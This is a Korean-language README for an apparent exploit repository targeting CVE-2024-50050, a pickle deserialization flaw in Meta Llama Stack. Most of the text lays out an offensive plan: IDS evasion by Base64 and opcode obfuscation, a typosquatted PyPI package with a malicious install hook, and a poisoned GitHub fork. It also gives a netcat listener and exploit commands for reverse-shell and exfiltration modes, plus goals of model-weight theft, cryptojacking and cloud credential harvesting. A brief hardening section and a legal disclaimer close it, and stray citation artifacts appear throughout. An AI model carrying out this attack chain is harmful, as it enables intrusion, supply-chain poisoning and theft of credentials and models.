
LlamaStack-RCE: 결정적 공급망 익스플로잇 및 하드닝 프레임워크 [CVE-2024-50050] AI 보안 연구에 중점 AI-SupplyChain-Poisoning: 고급 PVM Opcode 조작 및 ZeroMQ 인젝션 랩
= doi.org/10.5281/zenodo.18278567
= orcid.org/0009-0007-7728-256X
LlamaStack-RCE는 Meta Llama Stack의 CVE-2024-50050, 즉 치명적인 원격 코드 실행(RCE) 취약점을 대상으로 하는 고정밀 시뮬레이션 및 공격 프레임워크입니다. 이 취약점은 Python 기반 추론 API 내의 안전하지 않은 역직렬화, 특히 ZeroMQ(0MQ) 전송 계층을 통한 pickle 모듈 사용에서 발생합니다.
이 저장소는 업스트림 공급망 오염부터 다운스트림 실행 및 모델 가중치 탈취까지 전체 공격 체인을 제공합니다.
익스플로잇의 핵심은 Pickle 가상 머신(PVM) 을 대상으로 합니다. GLOBAL opcode를 활용하여 PVM이 사용 가능한 모든 Python 모듈을 가져오고 unpickling 과정 중 임의의 함수를 실행하도록 강제할 수 있습니다.
공격 벡터: ZeroMQ Socket -> Raw Byte Stream -> pickle.loads() -> RCE.
기존 시그니처 기반 IDS(Snort/Suricata)를 우회하기 위해 프레임워크는 다형성 인코딩을 구현합니다:
Base64 중첩 실행: /bin/bash 또는 os.system 같은 리터럴 문자열을 숨기기 위해 셸 명령을 Base64로 캡슐화합니다.
Opcode 난독화: 실행 로직을 변경하지 않고 바이너리 시그니처를 바꾸기 위해 PVM 명령어를 재배열합니다.
패킷 밀수: pickle 페이로드를 여러 ZeroMQ 프레임으로 분할하여 볼륨 기반 이상 탐지를 회피합니다.
프레임워크는 전체적인 공급망 무기화를 시뮬레이션합니다:
| 단계 | 전략 | 기술 구현 |
|---|---|---|
| I: 업스트림 | 타이포스쿼팅 | setup.py의 악성 PostInstallCommand와 함께 metalama-stack을 PyPI에 등록합니다. |
|
| II: 배포 | 오염된 포크 | connection.py에 "숨겨진 Pickle 인터프리터"가 있는 GitHub의 고성능 Llama Stack 포크.
|
| III: 실행 | CI/CD 트리거 | 대상의 Jenkins/GitHub Actions 환경에서 pip install 중 자동 실행.
| | IV: 지속성 | 로직 폭탄 | 장기 C2 접근 및 모델 탈취를 위한 다단계 백그라운드 스테이저.
|
하드웨어: 4x NVIDIA A100/H100 (로컬 가중치 테스트용).
운영체제: 강화된 Arch Linux 또는 Kali Linux.
환경: Docker 및 Docker-Compose (격리된 네트워크).
.
[cite_start]├── lab_validator.py # 7-stage automated validation suite [cite: 206, 264]
[cite_start]├── exploit_cve_2024_50050.py # Main exploitation framework [cite: 138, 206]
[cite_start]├── server.py # Vulnerable Llama Stack simulation [cite: 112, 150]
[cite_start]├── setup.py # Weaponized supply chain installer [cite: 110, 206]
[cite_start]├── post_exploit.py # Data harvesting & lateral movement [cite: 210, 264]
[cite_start]└── evasion_library.py # 12+ advanced evasion methods [cite: 264]
[cite_start]python lab_validator.py # Target: 100% Pass Rate [cite: 208, 209]
nc -lvnp 4444
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode shell --shell-type python [cite: 145, 148]
[cite_start]python exploit_cve_2024_50050.py --target 172.20.0.10 --c2 172.20.0.20 --mode exfil [cite: 146, 148]
성공적인 악용 시 AI 인프라에 대한 절대적인 제어권이 부여됩니다:
지적 재산 탈취: .safetensors 모델 가중치 탈취 ($10M - $100M+ 가치).
GPU 하이재킹: 크립토재킹 또는 섀도우 트레이닝을 위한 무단 CUDA 리소스 할당.
추론 조작: 다운스트림 애플리케이션(의료/법률 AI)의 시스템적 오류를 유발하도록 모델 응답을 오염.
자격 증명 수집: /proc/self/environ에서 AWS/GCP 키 및 K8s 구성 추출.
CVE-2024-50050을 완화하려면 다음 절대 규칙을 적용해야 합니다:
Pickle 근절: 모든 pickle.loads()를 safetensors.torch.load_file() 또는 엄격한 스키마를 가진 msgpack으로 교체합니다.
ZMQ 하드닝: 공개/개인 키 쌍으로 ZMQ_CURVE를 구현하고 절대 0.0.0.0에 바인딩하지 마십시오.
인프라 격리: RCE 컨테이너 탈출을 방지하기 위해 AI 프로세스를 gVisor 또는 Kata Containers에서 실행합니다.
네트워크 마이크로 세분화: 엄격하게 정의된 수신/송신 규칙을 사용하여 추론 서버를 공개 인터넷과 분리합니다.
법적 고지: 사전 서면 승인 없이 대상을 공격하는 데 이 프레임워크를 사용하는 것은 불법입니다. 본 도구는 교육 및 승인된 침투 테스트 목적으로만 제공됩니다. 저자(Sastra_Adi_Wiguna)는 오용에 대한 책임을 지지 않습니다.
기밀 문서: PURPLE_ELITE_TEAMING_DEEP_REVERSE_ENGINEERING 2026 결정적 상태: 프로덕션 준비 완료 (98/100)